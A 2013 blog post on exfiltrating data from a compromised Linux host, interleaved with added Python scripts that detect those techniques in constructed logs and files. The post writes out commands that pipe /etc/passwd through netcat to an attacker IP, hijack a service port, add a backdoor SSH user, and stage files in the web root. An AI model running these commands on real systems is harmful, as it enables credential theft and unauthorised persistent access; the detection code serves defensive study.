Sunday, February 10, 2013

Basic Data Exfiltration

So you pwned the system and got root access. Awesome, but what's next? Oh, I need to get /etc/passwd and /etc/shadow out for a start. Ok, how?

There are a couple of ways to do it:
1. Meterpreter's 'download' command
It's great if you're using meterpreter as the payload. Simple and hassle free. Just 'cd' and 'pwd' through the victim machine's directory without having to worry about the OS platform. But the limitation is if you are not using metasploit to pwn your victim machine, then you can't do this.

2. Netcat
Meow! Using this network utility to transfer a binary file is definitely a viable option.
All you'll need to do is:

Attacking Machine:~/goodies_folder/# nc -l -p 4444 > file_i_am_stealing.ext

Victim Machine:~/etc/# cat passwd | nc 192.168.1.200 4444
* 192.168.1.200 is, of course, the attacker's machine IP address, and 4444 has to match the port the listener above is bound to

Let's say the machine you've compromised has a host-based firewall that whitelists ports and denies all others. There are two ways to circumvent this:
- Tweak iptables <= Not recommended, coz' you're changing critical configuration of the host machine. I wouldn't want to trigger the IPS or FIM monitoring this victim machine :S
- Shut down a service and hijack the port. <= Say XYZ service is pretty much unused but is up and listening on port 112. Shut down the XYZ service, perform the exfil and then bring it back up.
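From the blue-team side, both of the tricks above leave traces on the host: the nc execution itself shows up in auditd EXECVE records, and the hijacked port shows up as a listener owned by the wrong process. The script below is an added example (not code from the original post) that parses constructed auditd lines and constructed `ss -tlnp` output; the "xyzd" service name and the EXPECTED_LISTENERS port-to-process baseline are assumptions for the demo.

```python
"""Spot netcat-style exfil and port hijacking from host telemetry.

Added example; not code from the original post. Inputs are constructed
auditd EXECVE records and `ss -tlnp`-style output, and the expected
owner of each listening port (EXPECTED_LISTENERS) is an assumed baseline.
"""
import re

# Tools that pipe stdin straight to a socket (the post uses nc).
NETWORK_PIPE_TOOLS = {"nc", "ncat", "netcat"}

# Constructed auditd records in the Linux audit EXECVE layout. Real auditd
# hex-encodes arguments containing spaces or quotes; that case is skipped here.
AUDIT_LINES = [
    'type=EXECVE msg=audit(1360500000.101:301): argc=2 a0="cat" a1="passwd"',
    'type=EXECVE msg=audit(1360500000.102:302): argc=3 a0="nc" a1="192.168.1.200" a2="4444"',
    'type=EXECVE msg=audit(1360500000.110:310): argc=2 a0="ls" a1="-la"',
    'type=EXECVE msg=audit(1360500000.120:320): argc=4 a0="/bin/nc" a1="-l" a2="-p" a3="112"',
]

_ARG_RE = re.compile(r'\ba(\d+)="([^"]*)"')


def parse_execve(line):
    """Return (event_id, argv) for one EXECVE record, or None for other record types."""
    if "type=EXECVE" not in line:
        return None
    m = re.search(r"msg=audit\(([^)]*)\)", line)
    event_id = m.group(1) if m else ""
    args = sorted((int(i), v) for i, v in _ARG_RE.findall(line))
    return event_id, [v for _, v in args]


def find_network_pipe_execs(lines):
    """Flag nc/ncat/netcat executions and label each as a listener or an outbound connect."""
    hits = []
    for line in lines:
        parsed = parse_execve(line)
        if parsed is None:
            continue
        event_id, argv = parsed
        if not argv or argv[0].rsplit("/", 1)[-1] not in NETWORK_PIPE_TOOLS:
            continue
        mode = "listener" if "-l" in argv[1:] else "outbound"
        hits.append({"event": event_id, "argv": argv, "mode": mode})
    return hits


# Constructed `ss -tlnp` output: port 112 should belong to a hypothetical
# service "xyzd", but nc has taken it over (the post's port-hijack trick).
SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*         users:(("sshd",pid=612,fd=3))
LISTEN 0      128    0.0.0.0:112        0.0.0.0:*         users:(("nc",pid=4471,fd=3))
LISTEN 0      128    0.0.0.0:80         0.0.0.0:*         users:(("apache2",pid=900,fd=4))
"""

# Assumed baseline of which process may own which listening port.
EXPECTED_LISTENERS = {22: "sshd", 112: "xyzd", 80: "apache2"}

_SS_RE = re.compile(r'^LISTEN\s+\d+\s+\d+\s+\S+:(\d+)\s+\S+\s+users:\(\("([^"]+)"')


def find_hijacked_ports(ss_text, expected):
    """Return (port, expected_process, actual_process) for every listener that differs from the baseline."""
    mismatches = []
    for line in ss_text.splitlines():
        m = _SS_RE.match(line)
        if not m:
            continue
        port, proc = int(m.group(1)), m.group(2)
        want = expected.get(port)
        if want is not None and proc != want:
            mismatches.append((port, want, proc))
    return mismatches


if __name__ == "__main__":
    for hit in find_network_pipe_execs(AUDIT_LINES):
        print("network pipe:", hit)
    for port, want, got in find_hijacked_ports(SS_OUTPUT, EXPECTED_LISTENERS):
        print(f"port {port}: expected {want}, found {got}")
```

The listener baseline is the part that catches the "stop XYZ, borrow its port" move: a firewall that only whitelists ports can't tell xyzd from nc, but a per-port owner check can. Running it on real hosts means feeding it the live `ss -tlnp` output and the audit log instead of the constructed strings.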

3. SSH
If the SSH daemon is up, create a new user e.g. ted
Victim Machine:~/# /usr/sbin/useradd ted
Victim Machine:~/# /usr/bin/passwd ted
* Set your password
Victim Machine:~/# echo "AllowUsers ted" >> /etc/ssh/sshd_config
Remember to do a netstat -tulpn | grep sshd to make sure that the SSH service is up.

Attacker's Machine:~/# ssh ted@192.168.1.100
* Enter ted's password at the prompt; ssh doesn't take it as a command-line argument (anything after the host is run as a remote command instead).

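The useradd / passwd / AllowUsers sequence above is exactly the kind of thing a host's auth.log and a config-file monitor will record, so here is an added example (not code from the original post) of correlating those traces: it parses a constructed Debian-style auth.log excerpt and a constructed sshd_config, and flags accounts created in the log window that are outside an assumed APPROVED_USERS baseline, noting whether they were added to AllowUsers and where they logged in from.

```python
"""Flag newly created accounts that were given SSH access.

Added example; not code from the original post. The auth.log excerpt and
sshd_config are constructed, and APPROVED_USERS is an assumed baseline of
accounts that are allowed to SSH in.
"""
import re

# Constructed /var/log/auth.log excerpt in the Debian useradd/passwd/sshd layout.
AUTH_LOG = """\
Feb 10 21:14:02 victim useradd[4412]: new user: name=ted, UID=1001, GID=1001, home=/home/ted, shell=/bin/bash
Feb 10 21:14:09 victim passwd[4415]: pam_unix(passwd:chauthtok): password changed for ted
Feb 10 21:15:30 victim sshd[4420]: Accepted password for ted from 192.168.1.200 port 51022 ssh2
Feb 10 21:20:01 victim sshd[4433]: Accepted publickey for ops-admin from 10.0.0.5 port 40110 ssh2
"""

# Constructed sshd_config after an `echo "AllowUsers ted" >> sshd_config`.
SSHD_CONFIG = """\
Port 22
PermitRootLogin no
AllowUsers ops-admin
AllowUsers ted
"""

APPROVED_USERS = {"ops-admin"}  # assumed baseline

_USERADD_RE = re.compile(r"useradd\[\d+\]: new user: name=([^,]+), UID=(\d+), GID=\d+, home=\S+, shell=([^,\s]+)")
_PASSWD_RE = re.compile(r"passwd\[\d+\]: pam_unix\(passwd:chauthtok\): password changed for (\S+)")
_ACCEPT_RE = re.compile(r"sshd\[\d+\]: Accepted \S+ for (\S+) from (\S+) port \d+")


def audit_auth_log(text):
    """Per user: creation details, whether a password was set, and accepted-login source IPs."""
    users = {}
    for line in text.splitlines():
        if m := _USERADD_RE.search(line):
            users.setdefault(m.group(1), {})["created"] = {"uid": int(m.group(2)), "shell": m.group(3)}
        elif m := _PASSWD_RE.search(line):
            users.setdefault(m.group(1), {})["password_set"] = True
        elif m := _ACCEPT_RE.search(line):
            users.setdefault(m.group(1), {}).setdefault("logins_from", []).append(m.group(2))
    return users


def allowed_ssh_users(config_text):
    """Every name listed by AllowUsers; the directive may appear more than once."""
    allowed = set()
    for line in config_text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0].lower() == "allowusers":
            allowed.update(parts[1:])
    return allowed


def find_suspicious_accounts(auth_log, sshd_config, approved):
    """Accounts created in the log window that are not in the approved baseline."""
    activity = audit_auth_log(auth_log)
    allowed = allowed_ssh_users(sshd_config)
    findings = []
    for name, info in activity.items():
        if "created" not in info or name in approved:
            continue
        findings.append({
            "user": name,
            "shell": info["created"]["shell"],
            "password_set": info.get("password_set", False),
            "in_allowusers": name in allowed,
            "logins_from": info.get("logins_from", []),
        })
    return findings


if __name__ == "__main__":
    for f in find_suspicious_accounts(AUTH_LOG, SSHD_CONFIG, APPROVED_USERS):
        print("unexpected SSH-capable account:", f)
```

The three log lines on their own are each unremarkable; the signal is the chain "account created, password set, AllowUsers edited, first login minutes later from an address that has never logged in before", which is why the function joins them per user rather than alerting on any one of them.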
4. wget
Good if your victim's machine has an Apache web server up and running.
Simply copy all the files you wanna exfil to /var/www/html
and then:

Attacker's machine:~/# wget http://192.168.1.100/file_you_wanna_retrieve.ext
Again, you want to make sure that your Apache is running ;)
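The flip side of "copy the files into /var/www/html" is that a web root is a very easy place to audit: anything in there that looks like a passwd or shadow file doesn't belong. The scanner below is an added example (not code from the original post). It builds a throwaway web root in a temp directory with constructed sample files (the shadow hashes are obvious placeholders) and returns the files whose contents match the passwd or shadow line format; nothing it does touches a real system.

```python
"""Scan a web root for stray copies of /etc/passwd and /etc/shadow.

Added example; not code from the original post. build_sample_webroot()
creates a throwaway directory with constructed content (the hashes are
placeholders, not real ones), so nothing here touches a real system.
"""
import os
import re
import tempfile

# passwd: exactly 7 colon-separated fields, numeric UID and GID.
PASSWD_LINE = re.compile(r"^[^:\s]+:[^:]*:\d+:\d+:[^:]*:[^:]*:[^:]*$")
# shadow: 9 fields, second one a crypt-style hash ($id$...) or a lock marker (*, !, !!).
SHADOW_LINE = re.compile(r"^[^:\s]+:(\$[0-9a-z]+\$[^:]*|[*!]*):\d*:\d*:\d*:\d*:\d*:\d*:[^:]*$")


def classify_text(text, min_lines=3, threshold=0.8):
    """Return 'passwd', 'shadow' or None depending on what most non-blank lines look like."""
    lines = [l for l in text.splitlines() if l.strip()]
    if len(lines) < min_lines:
        return None
    shadow_hits = sum(bool(SHADOW_LINE.match(l)) for l in lines)
    passwd_hits = sum(bool(PASSWD_LINE.match(l)) for l in lines)
    if shadow_hits >= threshold * len(lines):
        return "shadow"
    if passwd_hits >= threshold * len(lines):
        return "passwd"
    return None


def scan_webroot(root, max_bytes=1_000_000):
    """Walk root and return sorted (relative_path, kind) for files that look like credential dumps."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            try:
                if os.path.getsize(path) > max_bytes:
                    continue  # skip large media; copies of these files are small
                with open(path, encoding="utf-8", errors="replace") as fh:
                    kind = classify_text(fh.read())
            except OSError:
                continue
            if kind:
                findings.append((os.path.relpath(path, root).replace(os.sep, "/"), kind))
    return sorted(findings)


# Constructed samples; the shadow hashes are deliberately fake placeholders.
SAMPLE_FILES = {
    "index.html": "<html>\n<body>\n<p>welcome</p>\n</body>\n</html>\n",
    "dump/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                   "daemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"
                   "ted:x:1001:1001::/home/ted:/bin/bash\n",
    "dump/shadow": "root:$6$FAKESALT$FAKEHASHFAKEHASHFAKEHASH:15746:0:99999:7:::\n"
                   "daemon:*:15746:0:99999:7:::\n"
                   "ted:$6$FAKESALT$ANOTHERFAKEHASH:15746:0:99999:7:::\n",
}


def build_sample_webroot():
    """Create the constructed web root in a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="webroot_")
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


def demo():
    """Build the sample web root, scan it, and return the findings."""
    return scan_webroot(build_sample_webroot())


if __name__ == "__main__":
    for rel, kind in demo():
        print(f"{kind} dump found in web root: {rel}")
```

Matching on line structure rather than file name is deliberate: a copy renamed to `logo.png` or `styles.css` still has seven colon-separated fields per line, and the 80% threshold tolerates a few comment or junk lines without letting a single lookalike line trigger it.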

5. Other ways
There are a couple of more ways but I need to run already, so here's some brief mentions:
- FTP <-- Set up FTP, or just SCP your files across
- Covert Channels <-- You can craft ICMP packets and fit your data inside. Haven't tried it yet, but will blog it when I do.
- Email <-- It's lame, but if you got startx or you've VNC-ed into your victim's machine, you can exfil through web browsers =D

Alrighty, hope these help. Gotta run. Happy fun times~

Break To Protect,
J.S. 
